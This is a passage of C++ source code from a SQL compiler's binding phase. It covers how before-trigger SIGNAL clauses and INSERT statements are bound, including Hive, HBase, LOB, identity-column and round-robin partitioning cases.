CMPASSERT(currentAssign->getOperatorType() == ITM_ASSIGN); currentAssign->bindNode(bindWA); } } } ////////////////////////////////////////////////////////////////////////////// // This method is called for before triggers that use the SIGNAL clause. // 1. Find the "virtual execId column" in origRETDesc. // 3. Get the column's ItemExpr expression, and save it in passThruExpr. // 4. Create an ItemExpr tree as follows: // case // | // IfThenElse // / | \ // AND passThruExpr passThruExpr // / \ // condition RaiseError // // where condition is the WHEN clause expression, and RaiseError is the // SIGNAL expression. // 5. Bind this new expression in the RETDesc of the current scope. // 6. remove "virtual execId column" from origRETDesc, and re-insert it as // the new expression. // // The value of the expression is always the passThruExpr, for type // compatibility. since if the SIGNAL fires, the actual value returned does // not matter. The AND will evaluate the RaiseError only if the condition // evaluates to TRUE. ////////////////////////////////////////////////////////////////////////////// void BeforeTrigger::bindSignalClause(BindWA *bindWA, RETDesc *origRETDesc, CollHeap *heap) { if (bindWA->inDDL()) { // In DDL time (CREATE TRIGGER) all we need is to bind the signal // expression for semantic checks. signal_->bindNode(bindWA); if (bindWA->errStatus()) return; } else { // The SIGNAL expression is piggy-backed on the Unique ExecuteID // value inserted into the temp table. ColumnNameMap *execIdCol = origRETDesc->findColumn(InliningInfo::getExecIdVirtualColName()); CMPASSERT(execIdCol != NULL); const ColRefName& ExecIdColName = execIdCol->getColRefNameObj(); ItemExpr *passThruExpr = execIdCol->getValueId().getItemExpr(); ItemExpr *whenAndSignal = NULL; // Case 10-040604-5021: // General AND logic uses "short circuiting" as follows: if the // left side is FALSE, evaluation of the right side is skipped, and // the result returned is FALSE. The following expression depends on // evaluation of the right side being skipped whenever the left side // is NOT TRUE, (i.e., FALSE or NULL). Therefore, an IS TRUE unary // predicate must be placed above the actual WHEN condition. Otherwise, // the signal will fire when the WHEN condition evaluates to NULL. if (whenClause_ != NULL) { if (whenClause_->getOperatorType() == ITM_AND || whenClause_->getOperatorType() == ITM_OR) { ItemExpr *isTrueExpr = new (heap) UnLogic(ITM_IS_TRUE, whenClause_); whenAndSignal = new(heap) BiLogic(ITM_AND, isTrueExpr, signal_); } else { whenAndSignal = new(heap) BiLogic(ITM_AND, whenClause_, signal_); } } else // After we add the support for reading the trigger status from // the resource fork, and adding it to the condition, we should // never get here. whenAndSignal = signal_; // For type compatibity, the original value is used whatever the // WHEN clause evaluates to. However, if it evaluates to TRUE, the // evaluation of the signal expression will throw an SQLERROR. ItemExpr *condSignalExpr = new(heap) Case(NULL, new(heap) IfThenElse(whenAndSignal, passThruExpr, passThruExpr)); condSignalExpr = condSignalExpr->bindNode(bindWA); if (bindWA->errStatus()) return; // Now delete the original "virtual column" from the RETDesc, and // re-insert it with the new value. origRETDesc->delColumn(bindWA, ExecIdColName, USER_COLUMN); origRETDesc->addColumn(bindWA, ExecIdColName, condSignalExpr->getValueId()); } } ////////////////////////////////////////////////////////////////////////////// // This bind is bottom-up, so we first bind the children, and then use // and change the RETDesc they created. ////////////////////////////////////////////////////////////////////////////// RelExpr *BeforeTrigger::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindChildren(bindWA); if (bindWA->errStatus()) return this; // Now we know that we have the columns of OLD@ and NEW@ in the RETDesc // of the current scope. Save this scope so we can update it and restore // it when we are done. RETDesc *origRETDesc = bindWA->getCurrentScope()->getRETDesc(); CollHeap *heap = bindWA->wHeap(); CollIndex refsToFind = getRefList().entries(); // For each reference to change, Find the table name in the RETDesc, // and save a pointer to it's column list in the TableRefName object. CollIndex i=0; for (i=0; i<refsToFind; i++) getRefList().at(i).lookupTableName(origRETDesc); // Create an empty RETDesc for the current scope. // It will contain the names the user specified (MY_NEW, MY_OLD) for the // OLD@ and NEW@ transition variables, and will be used to bind this // node only. bindWA->getCurrentScope()->setRETDesc(new(heap) RETDesc(bindWA)); // For each table reference, add to the RETDesc of the current scope, // the columns of the referenced tables with the new referencing names // as correlation names. for (i=0; i<refsToFind; i++) getRefList().at(i).bindRefColumns(bindWA); // First bind the condition. The ValueId will be used later (possibly // multiple times) so that during execution, the expression will be // evaluated only once. if (whenClause_ != NULL) { whenClause_ = whenClause_->bindNode(bindWA); if (bindWA->errStatus()) return this; } // Use the bound condition to prepare the conditional expression // for each column modified by the trigger (SET MY_NEW.a = ...) if (setList_ != NULL) bindSetClause(bindWA, origRETDesc, heap); // Use the bound condition to prepare the conditional SIGNAL // expression, on the ExecuteId "virtual column". if (signal_ != NULL) bindSignalClause(bindWA, origRETDesc, heap); if (bindWA->errStatus()) return this; // We don't need the RETDesc of the current scope anymore. Restore the // original RETDesc with the updated columns. bindWA->getCurrentScope()->setRETDesc(origRETDesc); if (parentTSJ_ != NULL) { // If this is the top most before trigger, save a copy of the RETDesc // for use by the transformNode() pass. RETDesc *savedRETDesc = new(heap) RETDesc(bindWA, *origRETDesc); setRETDesc(savedRETDesc); } // // Bind the base class. // RelExpr *boundNode = bindSelf(bindWA); return boundNode; } // BeforeTrigger::bindNode() // ----------------------------------------------------------------------- // member functions for class Insert // ----------------------------------------------------------------------- // LCOV_EXCL_START - cnu static void bindInsertRRKey(BindWA *bindWA, Insert *insert, ValueIdList &sysColList, CollIndex i) { // For a KS round-robin partitioned table, the system column // (for now there is only one, SYSKEY) is initialized via the expression // "ProgDistribKey(partNum, rowPos, totalNumParts)". // const NAFileSet *fs = insert->getTableDesc()->getClusteringIndex()->getNAFileSet(); // For now, round-robin partitioned tables are always stored in // key-sequenced files, and there is only one system column (SYSKEY) // which is at the beginning of the record. CMPASSERT(fs->isKeySequenced() && i==0); CollHeap *heap = bindWA->wHeap(); // Host variables that provide access to partition number, // row position, and total number of partitions -- // supplied at run-time by the executor insert node. // ItemExpr *partNum = new (heap) HostVar("_sys_hostVarInsertPartNum", new (heap) SQLInt(FALSE,FALSE), // int unsigned not null TRUE // is system-generated ); partNum->synthTypeAndValueId(); insert->partNumInput() = partNum->getValueId(); // for later use in codeGen ItemExpr *rowPos = new (heap) HostVar("_sys_hostVarInsertRowPos", new (heap) SQLInt(FALSE,FALSE), // int unsigned not null TRUE // is system-generated ); rowPos->synthTypeAndValueId(); insert->rowPosInput() = rowPos->getValueId(); // for later use in codeGen ItemExpr *totNumParts = new (heap) HostVar("_sys_hostVarInsertTotNumParts", new (heap) SQLInt(FALSE,FALSE), // int unsigned not null TRUE // is system-generated ); totNumParts->synthTypeAndValueId(); insert->totalNumPartsInput() = totNumParts->getValueId(); // for later use // Generate expression to compute a round-robin key. Parameters to // ProgDistribKey are the partition number, the row position (which // is chosen randomly; the insert node will retry if a number is // selected that is already in use), and the total number of // partitions. ItemExpr *rrKey = new (heap) ProgDistribKey(partNum, rowPos, totNumParts); // Build and set round-robin key expression. Assign *assign = new (heap) Assign(sysColList[i].getItemExpr(), rrKey, FALSE /*not user-specified*/); assign->bindNode(bindWA); insert->rrKeyExpr() = assign->getValueId(); } // bindInsertRRKey // LCOV_EXCL_STOP RelExpr *Insert::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Set local binding flags setInUpdateOrInsert(bindWA, this, REL_INSERT); // The 8108 (unique constraint on an ID column) error must be raised // only for system generated IDENTITY values and not for // user generated ID values. We use the GenericUpdate::identityColumnUniqueIndex_ // to indicate to the EID that 8108 should be raised in place of 8102. // This variable is used to indicate that there is an IDENTITY column // in the table for which the system is generating the value // This is NULL if "DEFAULT VALUES" was specified, // non-NULL if a query-expr child was specified: VALUES.., TABLE.., SELECT.. RelExpr *someNonDefaultValuesSpecified = child(0); // Set flag for firstN in context if (child(0) && child(0)->getOperatorType() == REL_ROOT) // Indicating subquery if (child(0)->castToRelExpr() && child(0)->castToRelExpr()->getFirstNRows() >= 0) if (bindWA && bindWA->getCurrentScope() && bindWA->getCurrentScope()->context()) bindWA->getCurrentScope()->context()->firstN() = TRUE; if (NOT someNonDefaultValuesSpecified) { // "DEFAULT VALUES" specified // Kludge up a dummy child before binding the GenericUpdate tree setChild(0, new(bindWA->wHeap()) Tuple(new(bindWA->wHeap()) SystemLiteral(0))); } // Bind the GenericUpdate tree. // RETDesc *incomingRETDescForSource = bindWA->getCurrentScope()->getRETDesc(); RelExpr *boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; const NAFileSet* fileset = getTableDesc()->getNATable()->getClusteringIndex(); const NAColumnArray& partKeyCols = fileset->getPartitioningKeyColumns(); if (getTableDesc()->getNATable()->isHiveTable()) { if (partKeyCols.entries() > 0) { // Insert into partitioned tables would require computing the target // partition directory name, something we don't support yet. *CmpCommon::diags() << DgSqlCode(-4222) << DgString0("Insert into partitioned Hive tables"); bindWA->setErrStatus(); return this; } RelExpr * mychild = child(0); const HHDFSTableStats* hTabStats = getTableDesc()->getNATable()->getClusteringIndex()->getHHDFSTableStats(); const char * hiveTablePath; NAString hostName; Int32 hdfsPort; NAString tableDir; NABoolean result; char fldSep[2]; char recSep[2]; memset(fldSep,'\0',2); memset(recSep,'\0',2); fldSep[0] = hTabStats->getFieldTerminator(); recSep[0] = hTabStats->getRecordTerminator(); // don't rely on timeouts to invalidate the HDFS stats for the target table, // make sure that we invalidate them right after compiling this statement, // at least for this process ((NATable*)(getTableDesc()->getNATable()))->setClearHDFSStatsAfterStmt(TRUE); // inserting into tables with multiple partitions is not yet supported CMPASSERT(hTabStats->entries() == 1); hiveTablePath = (*hTabStats)[0]->getDirName(); result = ((HHDFSTableStats* )hTabStats)->splitLocation (hiveTablePath, hostName, hdfsPort, tableDir) ; if (!result) { *CmpCommon::diags() << DgSqlCode(-4224) << DgString0(hiveTablePath); bindWA->setErrStatus(); return this; } // NABoolean isSequenceFile = (*hTabStats)[0]->isSequenceFile(); const NABoolean isSequenceFile = hTabStats->isSequenceFile(); RelExpr * unloadRelExpr = new (bindWA->wHeap()) FastExtract( mychild, new (bindWA->wHeap()) NAString(hiveTablePath), new (bindWA->wHeap()) NAString(hostName), hdfsPort, TRUE, new (bindWA->wHeap()) NAString(getTableName().getQualifiedNameObj().getObjectName()), FastExtract::FILE, bindWA->wHeap()); RelExpr * boundUnloadRelExpr = unloadRelExpr->bindNode(bindWA); if (bindWA->errStatus()) return NULL; ((FastExtract*)boundUnloadRelExpr)->setRecordSeparator(recSep); ((FastExtract*)boundUnloadRelExpr)->setDelimiter(fldSep); ((FastExtract*)boundUnloadRelExpr)->setOverwriteHiveTable(getOverwriteHiveTable()); ((FastExtract*)boundUnloadRelExpr)->setSequenceFile(isSequenceFile); if (getOverwriteHiveTable()) { RelExpr * newRelExpr = new (bindWA->wHeap()) ExeUtilFastDelete(getTableName(), NULL, (char*)"hive_truncate", CharInfo::ISO88591, FALSE, TRUE, TRUE, TRUE, bindWA->wHeap(), TRUE, new (bindWA->wHeap()) NAString(tableDir), new (bindWA->wHeap()) NAString(hostName), hdfsPort); //new root to prevent error 4056 when binding newRelExpr = new (bindWA->wHeap()) RelRoot(newRelExpr); RelExpr *blockedUnion = new (bindWA->wHeap()) Union(newRelExpr, boundUnloadRelExpr); ((Union*)blockedUnion)->setBlockedUnion(); ((Union*)blockedUnion)->setSerialUnion(); RelExpr *boundBlockedUnion = blockedUnion->bindNode(bindWA); if (bindWA->errStatus()) return NULL; return boundBlockedUnion; } return boundUnloadRelExpr; } if(!(getOperatorType() == REL_UNARY_INSERT && (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST || // VALUES (1,'b'),(2,'Y') child(0)->getOperatorType() == REL_UNION)) && // VALUES with subquery (getOperatorType() != REL_LEAF_INSERT)) { setInsertSelectQuery(TRUE); } // if table has a lob column, then fix up any reference to LOBinsert // function in the source values list. // if ((getOperatorType() == REL_UNARY_INSERT) && (getTableDesc()->getNATable()->hasLobColumn()) && (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST)) // VALUES (1,'b'),(2,'Y') { if (child(0)->getOperatorType() == REL_TUPLE_LIST) { TupleList * tl = (TupleList*)(child(0)->castToRelExpr()); for (CollIndex x = 0; x < (UInt32)tl->numTuples(); x++) { ValueIdList tup; if (!tl->getTuple(bindWA, tup, x)) { bindWA->setErrStatus(); return boundExpr; // something went wrong } for (CollIndex n = 0; n < tup.entries(); n++) { ItemExpr * ie = tup[n].getItemExpr(); if (ie->getOperatorType() == ITM_LOBINSERT) { // cannot have this function in a values list with multiple // tuples. Use a single tuple. *CmpCommon::diags() << DgSqlCode(-4483); bindWA->setErrStatus(); return boundExpr; LOBinsert * li = (LOBinsert*)ie; li->insertedTableObjectUID() = getTableDesc()->getNATable()->objectUid().castToInt64(); li->lobNum() = n; li->insertedTableSchemaName() = getTableDesc()->getNATable()-> getTableName().getSchemaName(); } } // for } // for } // if tuplelist } // if // Prepare for any IDENTITY column checking later on NAString identityColumnName; NABoolean identityColumnGeneratedAlways = FALSE; identityColumnGeneratedAlways = getTableDesc()->isIdentityColumnGeneratedAlways(&identityColumnName); if ((getTableName().isVolatile()) && (CmpCommon::context()->sqlSession()->volatileSchemaInUse()) && (getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE) && ((ActiveSchemaDB()->getDefaults()).getAsLong(IMPLICIT_UPD_STATS_THRESHOLD) > -1) && (bindWA->isInsertSelectStatement()) && (NOT getTableDesc()->getNATable()->isVolatileTableMaterialized())) { if (NOT Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL)) // if (NOT Get_SqlParser_Flags(NO_IMPLICIT_VOLATILE_TABLE_UPD_STATS)) { // treat this insert as a volatile load stmt. RelExpr * loadVolTab = new (bindWA->wHeap()) ExeUtilLoadVolatileTable(getTableName(), this, bindWA->wHeap()); boundExpr = loadVolTab->bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; return boundExpr; } else { NATable * nat = (NATable*)(getTableDesc()->getNATable()); nat->setIsVolatileTableMaterialized(TRUE); } } // Now we have to create the following three collections: // // - newRecExpr() // An unordered set of Assign nodes of the form // "col1 = value1, col2 = value2, ..." which is used by Norm/Optimizer. // // - newRecExprArray() // An ordered array of Assign nodes of the same form, // ordered by column position, which is used by Generator. // This array must have the following properties: // // - All columns not specified in the insert statement must be // Assign'ed with their default values. // // - If this is a key-sequenced table with a (non-RR) SYSKEY column, // we must create the first entry in the newRecExprArray // to be "SYSKEY_COL = 0". This is a placeholder where the timestamp // value will be moved at runtime. Round-robin SYSKEY columns are // initialized via an expression of the form "SYSKEY_COL = // ProgDistribKey(..params..)". SYSKEY columns for other table // organizations are handled by the file system or disk process. // // - updateToSelectMap() // A ValueIdMap that can be used to rewrite value ids of the // target table in terms of the source table and vice versa. // The top value ids are target value ids, the bottom value ids // are those of the source. // NABoolean view = bindWA->getNATable(getTableName())->getViewText() != NULL; ValueIdList tgtColList, userColList, sysColList, *userColListPtr; CollIndexList colnoList; CollIndex totalColCount, defaultColCount, i; getTableDesc()->getSystemColumnList(sysColList); // // Detach the column list and bind the columns to the target table. // Set up "colnoList" to map explicitly specified columns to where // in the ordered array we will be inserting later. // ItemExpr *columnTree = removeInsertColTree(); CMPASSERT(NOT columnTree || someNonDefaultValuesSpecified); if (columnTree || (view && someNonDefaultValuesSpecified)) { // // INSERT INTO t(colx,coly,...) query-expr; // INSERT INTO v(cola,colb,...) query-expr; // INSERT INTO v query-expr; // where query-expr is VALUES..., TABLE..., or SELECT..., // but not DEFAULT VALUES. // userColList is the full list of columns in the target table // colnoList contains, for those columns specified in tgtColList, // their ordinal position in the target table user column list // (i.e., not counting system columns, which can't be specified // in the insert column list); e.g. '(Z,X,Y)' -> [3,1,2] // CMPASSERT(NOT columnTree || columnTree->getOperatorType() == ITM_REFERENCE || columnTree->getOperatorType() == ITM_ITEM_LIST); getTableDesc()->getUserColumnList(userColList); userColListPtr = &userColList; RETDesc *columnLkp; if (columnTree) { // bindRowValues will bind using the currently scoped RETDesc left in // by GenericUpdate::bindNode, which will be that of the naTableTop // (topmost view or table), *not* that of the base table (getTableDesc()). columnLkp = bindRowValues(bindWA, columnTree, tgtColList, this, FALSE); if (bindWA->errStatus()) return boundExpr; } else { columnLkp = bindWA->getCurrentScope()->getRETDesc(); columnLkp->getColumnList()->getValueIdList(tgtColList); } if (GU_DEBUG) { // LCOV_EXCL_START - dpm cerr << "columnLkp " << flush; columnLkp->display(); // LCOV_EXCL_STOP } for (i = 0; i < columnLkp->getDegree(); i++) { // Describes column in the base table: ValueId source = columnLkp->getValueId(i); const NAColumn *nacol = source.getNAColumn(); // Gets name of the column in this (possibly view) table: const ColRefName colName = columnLkp->getColRefNameObj(i); // solution 10-081114-7315 if (bindWA->inDDL() && bindWA->isInTrigger ()) { if (!userColListPtr->contains(source)) { // 4001 column not found *CmpCommon::diags() << DgSqlCode(-4001) << DgColumnName(colName.getColName()) << DgString0(getTableName().getQualifiedNameObj().getQualifiedNameAsAnsiString()) << DgString1(bindWA->getDefaultSchema().getSchemaNameAsAnsiString()); bindWA->setErrStatus(); delete columnLkp; return boundExpr; } } if (columnLkp->findColumn(colName)->isDuplicate()) { // 4022 column specified more than once *CmpCommon::diags() << DgSqlCode(-4022) << DgColumnName(colName.getColName()); bindWA->setErrStatus(); delete columnLkp; return boundExpr; } colnoList.insert(nacol->getPosition()); // Commented out this assert, as Assign::bindNode below emits nicer errmsg // CMPASSERT((long)nacol->getPosition() - (long)firstColNumOnDisk >= 0); } if (columnTree) { delete columnLkp; columnLkp = NULL; } bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } else { // // INSERT INTO t query-expr; // INSERT INTO t DEFAULT VALUES; // INSERT INTO v DEFAULT VALUES; // userColListPtr points to tgtColList (which is the full list) // userColList not used (because tgtColList already is the full list) // colnoList remains empty (because tgtColList is already in order) // if no system columns, set to list of user cols otherwise getTableDesc()->getUserColumnList(tgtColList); userColListPtr = &tgtColList; if (sysColList.entries()) { // set up colnoList to indicate the user columns, to help // binding DEFAULT clauses in DefaultSpecification::bindNode() for (CollIndex uc=0; uc<tgtColList.entries(); uc++) { colnoList.insert(tgtColList[uc].getNAColumn()->getPosition()); } } } // Compute total number of columns. Note that there may be some unused // entries in newRecExprArray(), in the following cases: // - An SQL/MP entry sequenced table, entry 0 will not be used as // the syskey (col 0) is not stored in that type of table // - For computed columns that are not stored on disk totalColCount = userColListPtr->entries() + sysColList.entries(); newRecExprArray().resize(totalColCount); // Make sure children are bound -- GenericUpdate::bindNode defers // their binding to now if this is an INSERT..VALUES(..), // because only now do we have target column position info for // correct binding of INSERT..VALUES(..,DEFAULT,..) // in DefaultSpecification::bindNode. // // Save current RETDesc and XTNM. // Bind the source in terms of the original RETDesc, // with target column position info available through // bindWA->getCurrentScope()->context()->updateOrInsertNode() // (see DefaultSpecification::bindNode, calls Insert::getColDefaultValue). // Restore RETDesc and XTNM. // RETDesc *currRETDesc = bindWA->getCurrentScope()->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(incomingRETDescForSource); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); setTargetUserColPosList(colnoList); // if my child is a TupleList, then all tuples are to be converted/cast // to the corresponding target type of the tgtColList. // Pass on the tgtColList to TupleList so it can generate the Cast nodes // with the target types during the TupleList::bindNode. TupleList *tl = NULL; if (child(0)->getOperatorType() == REL_TUPLE_LIST) { tl = (TupleList *)child(0)->castToRelExpr(); tl->castToList() = tgtColList; } if (getTolerateNonFatalError() != RelExpr::UNSPECIFIED_) { HostArraysWA * arrayWA = bindWA->getHostArraysArea() ; if (arrayWA && arrayWA->hasHostArraysInTuple()) { if (getTolerateNonFatalError() == RelExpr::NOT_ATOMIC_) arrayWA->setTolerateNonFatalError(TRUE); else arrayWA->setTolerateNonFatalError(FALSE); // Insert::tolerateNonfatalError == ATOMIC_ } else if (NOT arrayWA->getRowwiseRowset()) { // NOT ATOMIC only for rowset inserts *CmpCommon::diags() << DgSqlCode(-30025) ; bindWA->setErrStatus(); return boundExpr; } } bindChildren(bindWA); if (bindWA->errStatus()) return this; // if this is an insert into native hbase table in _ROW_ format, then // validate that only REL_TUPLE or REL_TUPLE_LIST is being used. if ((getOperatorType() == REL_UNARY_INSERT) && (getTableDesc()->getNATable()->isHbaseRowTable())) { NABoolean isError = FALSE; if (NOT (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST)) // VALUES (1,'b'),(2,'Y') { isError = TRUE; } // Also make sure that inserts into column_details field of _ROW_ format // hbase virtual table are being done through column_create function. // For ex: insert into hbase."_ROW_".hb values ('1', column_create('cf:a', '100')) // if ((NOT isError) && (child(0)->getOperatorType() == REL_TUPLE)) { ValueIdList &tup = ((Tuple*)(child(0)->castToRelExpr()))->tupleExpr(); if (tup.entries() == 2) // can only have 2 entries { ItemExpr * ie = tup[1].getItemExpr(); if (ie && ie->getOperatorType() != ITM_HBASE_COLUMN_CREATE) { isError = TRUE; } } else isError = TRUE; } if ((NOT isError) && (child(0)->getOperatorType() == REL_TUPLE_LIST)) { TupleList * tl = (TupleList*)(child(0)->castToRelExpr()); for (CollIndex x = 0; x < (UInt32)tl->numTuples(); x++) { ValueIdList tup; if (!tl->getTuple(bindWA, tup, x)) { isError = TRUE; } if (NOT isError) { if (tup.entries() == 2) // must have 2 entries { ItemExpr * ie = tup[1].getItemExpr(); if (ie->getOperatorType() != ITM_HBASE_COLUMN_CREATE) { isError = TRUE; } } else isError = TRUE; } // if } // for } // if if (isError) { *CmpCommon::diags() << DgSqlCode(-1429); bindWA->setErrStatus(); return boundExpr; } } // the only time that tgtColList.entries()(Insert's colList) != tl->castToList().entries() // (TupleList's colList) is when DEFAULTS are removed in TupleList::bindNode() for insert // into table with IDENTITY column, where the system generates the values // for it using SG (Sequence Generator). // See TupleList::bindNode() for detailed comments. // When tgtColList.entries()(Insert's col list) is not // equal to tl->castToList().entries() (TupleList's column list) // make sure the correct colList is used during binding. ValueIdList newTgtColList; if(tl && (tgtColList.entries() != tl->castToList().entries())) { newTgtColList = tl->castToList(); CMPASSERT(newTgtColList.entries() == (tgtColList.entries() -1)); } else newTgtColList = tgtColList; setTargetUserColPosList(); bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); bindWA->getCurrentScope()->setRETDesc(currRETDesc); NABoolean bulkLoadIndex = bindWA->isTrafLoadPrep() && noIMneeded() ; if (someNonDefaultValuesSpecified) // query-expr child specified { const RETDesc &sourceTable = *child(0)->getRETDesc(); if ((sourceTable.getDegree() != newTgtColList.entries())&& !bulkLoadIndex) { // 4023 degree of row value constructor must equal that of target table *CmpCommon::diags() << DgSqlCode(-4023) #pragma nowarn(1506) // warning elimination << DgInt0(sourceTable.getDegree()) << DgInt1(tgtColList.entries()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return boundExpr; } OptSqlTableOpenInfo* stoiInList = NULL; for (CollIndex ii=0; ii < bindWA->getStoiList().entries(); ii++) { if (getOptStoi() && getOptStoi()->getStoi()) { if (strcmp((bindWA->getStoiList())[ii]->getStoi()->fileName(), getOptStoi()->getStoi()->fileName()) == 0) { stoiInList = bindWA->getStoiList()[ii]; break; } } } // Combine the ValueIdLists for the column list and value list into a // ValueIdSet (unordered) of Assign nodes and a ValueIdArray (ordered). // Maintain a ValueIdMap between the source and target value ids. CollIndex i2 = 0; const ColumnDescList *viewColumns = NULL; if (getBoundView()) viewColumns = getBoundView()->getRETDesc()->getColumnList(); if (bulkLoadIndex) { setRETDesc(child(0)->getRETDesc()); } for (i = 0; i < tgtColList.entries() && i2 < newTgtColList.entries(); i++) { if(tgtColList[i] != newTgtColList[i2]) continue; ValueId target = tgtColList[i]; ValueId source ; if (!bulkLoadIndex) source = sourceTable.getValueId(i2); else { ColRefName & cname = ((ColReference *)(baseColRefs()[i2]))->getColRefNameObj(); source = sourceTable.findColumn(cname)->getValueId(); } CMPASSERT(target != source); const NAColumn *nacol = target.getNAColumn(); const NAType &sourceType = source.getType(); const NAType &targetType = target.getType(); if ( DFS2REC::isFloat(sourceType.getFSDatatype()) && DFS2REC::isNumeric(targetType.getFSDatatype()) && (getTableDesc()->getNATable()->getPartitioningScheme() == COM_HASH_V1_PARTITIONING || getTableDesc()->getNATable()->getPartitioningScheme() == COM_HASH_V2_PARTITIONING) ) { const NAColumnArray &partKeyCols = getTableDesc()->getNATable() ->getClusteringIndex()->getPartitioningKeyColumns(); for (CollIndex j=0; j < partKeyCols.entries(); j++) { if (partKeyCols[j]->getPosition() == nacol->getPosition()) { ItemExpr *ie = source.getItemExpr(); ItemExpr *cast = new (bindWA->wHeap()) Cast(ie, &targetType, ITM_CAST); cast = cast->bindNode(bindWA); if (bindWA->errStatus()) return NULL; source = cast->getValueId(); } } } Assign *assign = new (bindWA->wHeap()) Assign(target.getItemExpr(), source.getItemExpr()); assign->bindNode(bindWA); if(bindWA->errStatus()) return NULL; if (stoiInList && !getUpdateCKorUniqueIndexKey()) { if(!getBoundView()) stoiInList->addInsertColumn(nacol->getPosition()); else { NABoolean found = FALSE; for (CollIndex k=0; k < viewColumns->entries(); k++) { if ((*viewColumns)[k]->getValueId() == target) { stoiInList->addInsertColumn((Lng32) k); found = TRUE; // Updatable views cannot have any underlying basetable column // appear more than once, so it's safe to break out of the loop. break; } } // loop k CMPASSERT(found); } } // // Check for automatically inserted TRANSLATE nodes. // Such nodes are inserted by the Implicit Casting And Translation feature. // If this node has a child TRANSLATE node, then that TRANSLATE node // is the real "source" that we must use from here on. // ItemExpr *assign_child = assign->child(1); if ( assign_child->getOperatorType() == ITM_CAST ) { const NAType& type = assign_child->getValueId().getType(); if ( type.getTypeQualifier() == NA_CHARACTER_TYPE ) { ItemExpr *assign_grndchld = assign_child->child(0); if ( assign_grndchld->getOperatorType() == ITM_TRANSLATE ) { source = assign_grndchld->getValueId(); CMPASSERT(target != source); } } } const NAType *colType = nacol->getType(); if (!colType->isSupportedType()) { *CmpCommon::diags() << DgSqlCode(-4027) // 4027 table not insertable << DgTableName(nacol->getNATable()->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); } if (bindWA->errStatus()) return boundExpr; newRecExprArray().insertAt(nacol->getPosition(), assign->getValueId()); newRecExpr().insert(assign->getValueId()); const NAType& assignSrcType = assign->getSource().getType(); // if ( <we added some type of conversion> AND // ( <tgt and src are both character> AND // (<they are big and errors can occur> OR <charsets differ> OR <difference between tgt and src lengths is large>))) // OR // ( <we changed the basic type and we allow incompatible types> ) // ) // <then incorporate this added conversion into the updateToSelectMap> if ( source != assign->getSource() && ((assignSrcType.getTypeQualifier() == NA_CHARACTER_TYPE && sourceType.getTypeQualifier() == NA_CHARACTER_TYPE && ((assign->getSource().getItemExpr()->getOperatorType() == ITM_CAST && sourceType.errorsCanOccur(assignSrcType) && sourceType.getNominalSize() > CmpCommon::getDefaultNumeric(LOCAL_MESSAGE_BUFFER_SIZE)*1024) || // Temporary code to fix QC4395 in M6. For M7, try to set source // to the right child of the assign after calling assign->bindNode. // We should then be able to eliminate this entire if statement // as well as the code to check for TRANSLATE nodes above. ((CharType &) assignSrcType).getCharSet() != ((CharType &) sourceType).getCharSet() || // The optimizer may ask for source data to be partitioned or sorted on original source columns // This is the reason we need to choose the else branch below unless we have a particular reason // to do otherwise. Each of the conditions in this if statement reflects one of those partcular // conditions. The bottomValues of updateToSelectMap will be placed in their entirety in the // characteristic outputs of the source node. Outputs of the source node may be used to allocate // buffers at runtime and therefore we would like to keep the output as small as possible. // If the source cannot be partioned/sorted on a column because we have assign-getSource in the bottomValues // then the cost is that data will be repartitioned with an additional exchange node. If the difference in // length between source and assignSrc is large then the cost of repartition is less than the cost of // allocating and using large buffers. sourceType.getNominalSize() > (assignSrcType.getNominalSize() + (ActiveSchemaDB()->getDefaults()).getAsLong(COMP_INT_98)) // default value is 512 )) || // If we allow incompatible type assignments, also include the // added cast into the updateToSelectMap assignSrcType.getTypeQualifier() != sourceType.getTypeQualifier() && CmpCommon::getDefault(ALLOW_INCOMPATIBLE_ASSIGNMENT) == DF_ON)) { updateToSelectMap().addMapEntry(target,assign->getSource()); } else { updateToSelectMap().addMapEntry(target,source); } i2++; } } setBoundView(NULL); // Is the table round-robin (horizontal) partitioned? PartitioningFunction *partFunc = getTableDesc()->getClusteringIndex()->getNAFileSet()-> getPartitioningFunction(); NABoolean isRRTable = partFunc && partFunc->isARoundRobinPartitioningFunction(); // Fill in default values for any columns not explicitly specified. // if (someNonDefaultValuesSpecified) // query-expr child specified, set system cols defaultColCount = totalColCount - newTgtColList.entries(); else // "DEFAULT VALUES" specified defaultColCount = totalColCount; if (identityColumnGeneratedAlways) defaultColCount = totalColCount; if (defaultColCount) { NAWchar zero_w_Str[2]; zero_w_Str[0] = L'0'; zero_w_Str[1] = L'\0'; // wide version CollIndex sysColIx = 0, usrColIx = 0; for (i = 0; i < totalColCount; i++) { ValueId target; NABoolean isASystemColumn = FALSE; const NAColumn *nacol = NULL; // find column on position i in the system or user column lists if (sysColIx < sysColList.entries() && sysColList[sysColIx].getNAColumn()->getPosition() == i) { isASystemColumn = TRUE; target = sysColList[sysColIx]; } else { CMPASSERT((*userColListPtr)[usrColIx].getNAColumn()->getPosition() == i); target = (*userColListPtr)[usrColIx]; } nacol = target.getNAColumn(); // if we need to add the default value, we don't have a new rec expr yet if (NOT newRecExprArray().used(i)) { // check for SQL/MP entry sequenced tables omitted above const char* defaultValueStr = NULL; ItemExpr * defaultValueExpr = NULL; NABoolean needToDeallocateColDefaultValueStr = FALSE; // Used for datetime columns with COM_CURRENT_DEFAULT. // NAType *castType = NULL; if (isASystemColumn) { if (isRRTable) { bindInsertRRKey(bindWA, this, sysColList, sysColIx); if (bindWA->errStatus()) return boundExpr; } if (nacol->isComputedColumn()) { 